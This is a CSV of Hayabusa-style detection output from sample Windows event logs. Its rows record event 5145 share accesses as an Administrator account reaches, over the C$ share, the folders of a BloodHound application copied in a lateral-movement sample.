2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
